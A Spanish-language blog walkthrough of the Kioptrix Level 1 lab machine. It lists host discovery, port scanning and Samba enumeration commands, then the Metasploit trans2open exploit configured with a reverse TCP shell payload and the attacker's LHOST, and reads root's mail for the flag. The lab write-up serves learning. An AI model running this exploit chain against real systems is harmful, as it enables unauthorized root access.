Warning: "continue" targeting switch is equivalent to "break". Did you mean to use "continue 2"? in /home/whitesy7/public_html/blog/wp-content/themes/Divi/includes/builder/functions.php on line 5689
Kioptrix Level 1 | WhiteSuit Hacking

Esta máquina Kioptrix VM es un desafío fácil. El objetivo del es adquirir acceso root a través de cualquier medio El objetivo de estos es aprender las herramientas y técnicas básicas para evaluar y explotar la vulnerabilidad. Hay más de una forma en la que se puede completar con éxito el desafío.

 

Una vez iniciada la maquina nos aparecerá algo como esto:

 

Como debe de ser una simulación lo mas cercano a una prueba, empezamos buscando la ip de la maquina con el comando

Netdiscover

Como estoy en un ambiente de vmware puedo ver que la ip que corresponde a kioptrix es la 192.168.1.104, ahora necesitamos saber que puertos tiene abiertos o que esta corriendo.

Nmap 192.168.1.104

Una vez que tenemos una idea de que esta corriendo, tenemos varias formas de intentar acceder, despues de checar el puerto 80 no encontre nada, asi que mi segunda opcion es ver que hay en el puerto 139 de Samba.

Smbclient -L  192.168.1.104

Despues de ejecutarlo, se puede ver que tiene samba usa 2.2.1ª, al buscar un poco en google encontre que hay un modulo de metasploit con el cual puedo hacer rce, a esa version, despues de inciar metasploit y configurarlo.

Search trans2open

Use exploit/linux/samba/trans2open

set PAYLOAD linux/x86/shell/reverse_tcp

Set RHOST 192.168.1.104

Set LHOST 192.168.1.69

Una vez terminado, al ponerle exploit, me genera una shell reversa sobre la maquina vulnerable, despues de buscar un rato la bandera la he encontrado en

 

cat /var/mail/root

 

Y listo, tenemos la bandera y así es como se termina esta maquina Kioptrix Level 1.